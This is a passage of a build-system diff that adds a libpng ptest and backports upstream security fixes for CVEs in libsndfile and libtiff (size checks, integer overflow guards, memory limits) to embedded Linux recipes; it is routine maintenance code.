+(Portable Network Graphics) raster image files. "
HOMEPAGE = "http://www.libpng.org/"
SECTION = "libs"
LICENSE = "Libpng"
@@ -7,7 +10,10 @@ DEPENDS = "zlib"
LIBV = "16"
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz"
+SRC_URI = "\
+ ${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz \
+ file://run-ptest \
+ "
SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9"
SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca"
@@ -17,7 +23,7 @@ UPSTREAM_CHECK_URI = "http://libpng.org/pub/png/libpng.html"
BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
-inherit autotools binconfig-disabled pkgconfig
+inherit autotools binconfig-disabled pkgconfig ptest
# Work around missing symbols
EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}"
@@ -30,3 +36,11 @@ BBCLASSEXTEND = "native nativesdk"
# CVE-2019-17371 is actually a memory leak in gif2png 2.x
CVE_CHECK_WHITELIST += "CVE-2019-17371"
+
+do_install_ptest() {
+ install -m644 "${S}/pngtest.png" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngfix" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngtest" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngstest" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/timepng" "${D}${PTEST_PATH}"
+}
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
new file mode 100644
index 0000000000..b42d564b4b
--- /dev/null
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
@@ -0,0 +1,13 @@
+Index: libsamplerate-0.1.8/configure.ac
+===================================================================
+--- libsamplerate-0.1.8.orig/configure.ac
++++ libsamplerate-0.1.8/configure.ac
+@@ -53,7 +53,7 @@ AC_PROG_LN_S
+ # 6. If any interfaces have been removed since the last public release, then set age
+ # to 0.
+
+-SHARED_VERSION_INFO="1:8:1"
++SHARED_VERSION_INFO="1:9:1"
+
+
+
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
index ae08189441..8345d6880f 100644
--- a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
@@ -1,4 +1,5 @@
SUMMARY = "Audio Sample Rate Conversion library"
+DESCRIPTION = "Also known as Secret Rabbit Code - a library for performing sample rate conversion of audio data."
HOMEPAGE = "http://www.mega-nerd.com/SRC/"
SECTION = "libs"
LICENSE = "BSD-2-Clause"
@@ -9,6 +10,7 @@ PR = "r1"
SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \
file://0001-configure.ac-improve-alsa-handling.patch \
+ file://shared_version_info.patch \
"
SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259"
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
new file mode 100644
index 0000000000..6354f856cb
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
@@ -0,0 +1,36 @@
+From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Wed, 17 Feb 2021 23:21:48 +0000
+Subject: [PATCH 1/2] wavlike: Fix incorrect size check
+
+The SF_CART_INFO_16K struct has an additional 4 byte field to hold
+the size of 'tag_text' which the file header doesn't, so don't
+include it as part of the check when looking for the max length.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/wavlike.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: libsndfile-1.0.28/src/wavlike.c
+===================================================================
+--- libsndfile-1.0.28.orig/src/wavlike.c
++++ libsndfile-1.0.28/src/wavlike.c
+@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf
+ return 0 ;
+ } ;
+
+- if (chunksize >= sizeof (SF_CART_INFO_16K))
++ /*
++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part
++ ** of the chunk, so don't include it in the size check.
++ */
++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4)
+ { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ;
+ psf_binheader_readf (psf, "j", chunksize) ;
+ return 0 ;
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
new file mode 100644
index 0000000000..d6b03d7d4d
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
@@ -0,0 +1,44 @@
+From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Thu, 18 Feb 2021 21:52:09 +0000
+Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks
+
+'blockalign' is the size of a block, and each block contains 7 samples
+per channel as part of the preamble, so check against 'samplesperblock'
+rather than 'blockalign'. Also add an additional check that the block
+is big enough to hold the samples it claims to hold.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/ms_adpcm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c
+index 5e8f1a31..a21cb994 100644
+--- a/src/ms_adpcm.c
++++ b/src/ms_adpcm.c
+@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock)
+ if (psf->file.mode == SFM_WRITE)
+ samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ;
+
+- if (blockalign < 7 * psf->sf.channels)
+- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ;
++ /* There's 7 samples per channel in the preamble of each block */
++ if (samplesperblock < 7 * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ;
++ return SFE_INTERNAL ;
++ } ;
++
++ if (2 * blockalign < samplesperblock * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ;
+ return SFE_INTERNAL ;
+ } ;
+
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
new file mode 100644
index 0000000000..f7ae82588f
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
@@ -0,0 +1,30 @@
+From ced91d7b971be6173b604154c39279ce90ad87cc Mon Sep 17 00:00:00 2001
+From: yuan <ssspeed00@gmail.com>
+Date: Tue, 20 Apr 2021 16:16:32 +0800
+Subject: [PATCH] flac: Fix improper buffer reusing (#732)
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/ced91d7b971be6173b604154c39279ce90ad87cc]
+CVE: CVE-2021-4156
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/flac.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/flac.c b/src/flac.c
+index 0be82ac..4fa5cfa 100644
+--- a/src/flac.c
++++ b/src/flac.c
+@@ -952,7 +952,11 @@ flac_read_loop (SF_PRIVATE *psf, unsigned len)
+ /* Decode some more. */
+ while (pflac->pos < pflac->len)
+ { if (FLAC__stream_decoder_process_single (pflac->fsd) == 0)
++ { psf_log_printf (psf, "FLAC__stream_decoder_process_single returned false\n") ;
++ /* Current frame is busted, so NULL the pointer. */
++ pflac->frame = NULL ;
+ break ;
++ } ;
+ state = FLAC__stream_decoder_get_state (pflac->fsd) ;
+ if (state >= FLAC__STREAM_DECODER_END_OF_STREAM)
+ { psf_log_printf (psf, "FLAC__stream_decoder_get_state returned %s\n", FLAC__StreamDecoderStateString [state]) ;
+--
+2.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
new file mode 100644
index 0000000000..e22b4e9389
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
@@ -0,0 +1,46 @@
+From 0754562e13d2e63a248a1c82f90b30bc0ffe307c Mon Sep 17 00:00:00 2001
+From: Alex Stewart <alex.stewart@ni.com>
+Date: Tue, 10 Oct 2023 16:10:34 -0400
+Subject: [PATCH] mat4/mat5: fix int overflow in dataend calculation
+
+The clang sanitizer warns of a possible signed integer overflow when
+calculating the `dataend` value in `mat4_read_header()`.
+
+```
+src/mat4.c:323:41: runtime error: signed integer overflow: 205 * -100663296 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in
+src/mat4.c:323:48: runtime error: signed integer overflow: 838860800 * 4 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in
+```
+
+Cast the offending `rows` and `cols` ints to `sf_count_t` (the type of
+`dataend` before performing the calculation, to avoid the issue.
+
+CVE: CVE-2022-33065
+Fixes: https://github.com/libsndfile/libsndfile/issues/789
+Fixes: https://github.com/libsndfile/libsndfile/issues/833
+
+Signed-off-by: Alex Stewart <alex.stewart@ni.com>
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/0754562e13d2e63a248a1c82f90b30bc0ffe307c]
+CVE: CVE-2022-33065
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/mat4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mat4.c b/src/mat4.c
+index 3c73680..e2f98b7 100644
+--- a/src/mat4.c
++++ b/src/mat4.c
+@@ -320,7 +320,7 @@ mat4_read_header (SF_PRIVATE *psf)
+ psf->filelength - psf->dataoffset, psf->sf.channels * psf->sf.frames * psf->bytewidth) ;
+ }
+ else if ((psf->filelength - psf->dataoffset) > psf->sf.channels * psf->sf.frames * psf->bytewidth)
+- psf->dataend = psf->dataoffset + rows * cols * psf->bytewidth ;
++ psf->dataend = psf->dataoffset + (sf_count_t) rows * (sf_count_t) cols * psf->bytewidth ;
+
+ psf->datalength = psf->filelength - psf->dataoffset - psf->dataend ;
+
+--
+2.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
index b100108766..fb7d94ab75 100644
--- a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
@@ -1,4 +1,7 @@
SUMMARY = "Audio format Conversion library"
+DESCRIPTION = "Library for reading and writing files containing sampled \
+sound (such as MS Windows WAV and the Apple/SGI AIFF format) through \
+one standard library interface."
HOMEPAGE = "http://www.mega-nerd.com/libsndfile"
AUTHOR = "Erik de Castro Lopo"
DEPENDS = "flac libogg libvorbis"
@@ -17,7 +20,11 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \
file://CVE-2017-12562.patch \
file://CVE-2018-19758.patch \
file://CVE-2019-3832.patch \
- "
+ file://CVE-2021-3246_1.patch \
+ file://CVE-2021-3246_2.patch \
+ file://CVE-2022-33065.patch \
+ file://CVE-2021-4156.patch \
+ "
SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c"
SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9"
diff --git a/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
new file mode 100644
index 0000000000..31f867e000
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
@@ -0,0 +1,52 @@
+From b12a0326e6064b6e0b051d1184a219877472f69b Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 25 Jan 2022 16:25:28 +0000
+Subject: [PATCH] tiffset: fix global-buffer-overflow for ASCII tags where
+ count is required (fixes #355)
+
+CVE: CVE-2022-22844
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/03047a26952a82daaa0792957ce211e0aa51bc64]
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+Comments: Add header stdint.h in tiffset.c explicitly for UINT16_MAX
+---
+ tools/tiffset.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiffset.c b/tools/tiffset.c
+index 8c9e23c5..e7a88c09 100644
+--- a/tools/tiffset.c
++++ b/tools/tiffset.c
+@@ -33,6 +33,7 @@
+ #include <string.h>
+ #include <stdlib.h>
+
++#include <stdint.h>
+ #include "tiffio.h"
+
+ static char* usageMsg[] = {
+@@ -146,9 +146,19 @@ main(int argc, char* argv[])
+
+ arg_index++;
+ if (TIFFFieldDataType(fip) == TIFF_ASCII) {
+- if (TIFFSetField(tiff, TIFFFieldTag(fip), argv[arg_index]) != 1)
+- fprintf( stderr, "Failed to set %s=%s\n",
+- TIFFFieldName(fip), argv[arg_index] );
++ if(TIFFFieldPassCount( fip )) {
++ size_t len;
++ len = strlen(argv[arg_index]) + 1;
++ if (len > UINT16_MAX || TIFFSetField(tiff, TIFFFieldTag(fip),
++ (uint16_t)len, argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ } else {
++ if (TIFFSetField(tiff, TIFFFieldTag(fip),
++ argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ }
+ } else if (TIFFFieldWriteCount(fip) > 0
+ || TIFFFieldWriteCount(fip) == TIFF_VARIABLE) {
+ int ret = 1;
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..9b4724a325
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,148 @@
+From 02875964eba5c4a2ea98c41562835428214adfe7 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sat, 7 Mar 2020 13:21:56 +0100
+Subject: [PATCH] tiff2rgba: output usage to stdout when using -h
+
+also uses std C EXIT_FAILURE / EXIT_SUCCESS
+see #17
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 39 ++++++++++++++++++++++++---------------
+ 1 file changed, 24 insertions(+), 15 deletions(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/02875964eba5c4a2ea98c41562835428214adfe7.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index 2eb6f6c4..ef643653 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -39,6 +39,13 @@
+ #include "tiffiop.h"
+ #include "tiffio.h"
+
++#ifndef EXIT_SUCCESS
++#define EXIT_SUCCESS 0
++#endif
++#ifndef EXIT_FAILURE
++#define EXIT_FAILURE 1
++#endif
++
+ #define streq(a,b) (strcmp(a,b) == 0)
+ #define CopyField(tag, v) \
+ if (TIFFGetField(in, tag, &v)) TIFFSetField(out, tag, v)
+@@ -68,7 +75,7 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
+ switch (c) {
+ case 'b':
+ process_by_block = 1;
+@@ -86,7 +93,7 @@ main(int argc, char* argv[])
+ else if (streq(optarg, "zip"))
+ compression = COMPRESSION_DEFLATE;
+ else
+- usage(-1);
++ usage(EXIT_FAILURE);
+ break;
+
+ case 'r':
+@@ -105,17 +112,20 @@ main(int argc, char* argv[])
+ bigtiff_output = 1;
+ break;
+
++ case 'h':
++ usage(EXIT_SUCCESS);
++ /*NOTREACHED*/
+ case '?':
+- usage(0);
++ usage(EXIT_FAILURE);
+ /*NOTREACHED*/
+ }
+
+ if (argc - optind < 2)
+- usage(-1);
++ usage(EXIT_FAILURE);
+
+ out = TIFFOpen(argv[argc-1], bigtiff_output?"w8":"w");
+ if (out == NULL)
+- return (-2);
++ return (EXIT_FAILURE);
+
+ for (; optind < argc-1; optind++) {
+ in = TIFFOpen(argv[optind], "r");
+@@ -132,7 +142,7 @@ main(int argc, char* argv[])
+ }
+ }
+ (void) TIFFClose(out);
+- return (0);
++ return (EXIT_SUCCESS);
+ }
+
+ static int
+@@ -166,7 +176,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != (rastersize / tile_height) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -182,7 +192,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -279,7 +289,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != (rastersize / rowsperstrip) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -295,7 +305,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -528,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-static char* stuff[] = {
++const static char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+@@ -547,13 +557,12 @@ static char* stuff[] = {
+ static void
+ usage(int code)
+ {
+- char buf[BUFSIZ];
+ int i;
++ FILE * out = (code == EXIT_SUCCESS) ? stdout : stderr;
+
+- setbuf(stderr, buf);
+- fprintf(stderr, "%s\n\n", TIFFGetVersion());
++ fprintf(out, "%s\n\n", TIFFGetVersion());
+ for (i = 0; stuff[i] != NULL; i++)
+- fprintf(stderr, "%s\n", stuff[i]);
++ fprintf(out, "%s\n", stuff[i]);
+ exit(code);
+ }
+
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..b6e1842a54
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,27 @@
+From ca70b5e702b9f503333344b2d46691de9feae84e Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 3 Oct 2020 18:16:27 +0200
+Subject: [PATCH] tiff2rgba.c: fix -Wold-style-declaration warning
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/ca70b5e702b9f503333344b2d46691de9feae84e.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index ef643653..fbc383aa 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -538,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-const static char* stuff[] = {
++static const char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..129721ff3e
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,119 @@
+From 98a254f5b92cea22f5436555ff7fceb12afee84d Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:02:51 +0100
+Subject: [PATCH 1/2] enforce (configurable) memory limit in tiff2rgba
+
+fixes #207
+fixes #209
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+---
+CVE: CVE-2020-35521
+CVE: CVE-2020-35522
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5a935d96b21cda0f434230cdf8ca958cd8b4eef.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index fbc383aa..764395f6 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -60,6 +60,10 @@ uint32 rowsperstrip = (uint32) -1;
+ int process_by_block = 0; /* default is whole image at once */
+ int no_alpha = 0;
+ int bigtiff_output = 0;
++#define DEFAULT_MAX_MALLOC (256 * 1024 * 1024)
++/* malloc size limit (in bytes)
++ * disabled when set to 0 */
++static tmsize_t maxMalloc = DEFAULT_MAX_MALLOC;
+
+
+ static int tiffcvt(TIFF* in, TIFF* out);
+@@ -75,8 +79,11 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8hM:")) != -1)
+ switch (c) {
++ case 'M':
++ maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;
++ break;
+ case 'b':
+ process_by_block = 1;
+ break;
+@@ -405,6 +412,12 @@ cvt_whole_image( TIFF *in, TIFF *out )
+ (unsigned long)width, (unsigned long)height);
+ return 0;
+ }
++ if (maxMalloc != 0 && (tmsize_t)pixel_count * (tmsize_t)sizeof(uint32) > maxMalloc) {
++ TIFFError(TIFFFileName(in),
++ "Raster size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT "), try -b option.",
++ (uint64)pixel_count * sizeof(uint32), (uint64)maxMalloc);
++ return 0;
++ }
+
+ rowsperstrip = TIFFDefaultStripSize(out, rowsperstrip);
+ TIFFSetField(out, TIFFTAG_ROWSPERSTRIP, rowsperstrip);
+@@ -530,6 +543,13 @@ tiffcvt(TIFF* in, TIFF* out)
+ TIFFSetField(out, TIFFTAG_SOFTWARE, TIFFGetVersion());
+ CopyField(TIFFTAG_DOCUMENTNAME, stringv);
+
++ if (maxMalloc != 0 && TIFFStripSize(in) > maxMalloc)
++ {
++ TIFFError(TIFFFileName(in),
++ "Strip Size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT ")",
++ (uint64)TIFFStripSize(in), (uint64)maxMalloc);
++ return 0;
++ }
+ if( process_by_block && TIFFIsTiled( in ) )
+ return( cvt_by_tile( in, out ) );
+ else if( process_by_block )
+@@ -539,7 +559,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ }
+
+ static const char* stuff[] = {
+- "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
++ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] [-M size] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+ " zip\t\tZip/Deflate encoding",
+@@ -551,6 +571,7 @@ static const char* stuff[] = {
+ " -b (progress by block rather than as a whole image)",
+ " -n don't emit alpha component.",
+ " -8 write BigTIFF file instead of ClassicTIFF",
++ " -M set the memory allocation limit in MiB. 0 to disable limit",
+ NULL
+ };
+
+--
+GitLab
+
+
+From e9e504193ef1f87e9cb5e986586b0cbe3254e421 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:08:42 +0100
+Subject: [PATCH 2/2] tiff2rgba.1: -M option
+
+---
+ man/tiff2rgba.1 | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/man/tiff2rgba.1 b/man/tiff2rgba.1
+index d9c9baae..fe9ebb2c 100644
+--- a/man/tiff2rgba.1
++++ b/man/tiff2rgba.1
+@@ -87,6 +87,10 @@ Drop the alpha component from the output file, producing a pure RGB file.
+ Currently this does not work if the
+ .B \-b
+ flag is also in effect.
++.TP
++.BI \-M " size"
++Set maximum memory allocation size (in MiB). The default is 256MiB.
++Set to 0 to disable the limit.
+ .SH "SEE ALSO"
+ .BR tiff2bw (1),
+ .BR TIFFReadRGBAImage (3t),
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
new file mode 100644
index 0000000000..1f30b32799
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
@@ -0,0 +1,55 @@
+From c8d613ef497058fe653c467fc84c70a62a4a71b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:54:30 +0100
+Subject: [PATCH] gtTileContig(): check Tile width for overflow
+
+fixes #211
+
+Upstream-Status: Backport [ https://gitlab.com/libtiff/libtiff/-/commit/c8d613ef497058fe653c467fc84c70a62a4a71b2 ]
+CVE: CVE-2020-35523
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ libtiff/tif_getimage.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 4da785d3..96ab1460 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -29,6 +29,7 @@
+ */
+ #include "tiffiop.h"
+ #include <stdio.h>
++#include <limits.h>
+
+ static int gtTileContig(TIFFRGBAImage*, uint32*, uint32, uint32);
+ static int gtTileSeparate(TIFFRGBAImage*, uint32*, uint32, uint32);
+@@ -645,12 +646,20 @@ gtTileContig(TIFFRGBAImage* img, uint32* raster, uint32 w, uint32 h)
+
+ flip = setorientation(img);
+ if (flip & FLIP_VERTICALLY) {
+- y = h - 1;
+- toskew = -(int32)(tw + w);
++ if ((tw + w) > INT_MAX) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = h - 1;
++ toskew = -(int32)(tw + w);
+ }
+ else {
+- y = 0;
+- toskew = -(int32)(tw - w);
++ if (tw > (INT_MAX + w)) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = 0;
++ toskew = -(int32)(tw - w);
+ }
+
+ /*
+--
+GitLab
+
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
new file mode 100644
index 0000000000..5232eacb50
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
@@ -0,0 +1,42 @@
+From c6a12721b46f1a72974f91177890301730d7b330 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:01:59 +0100
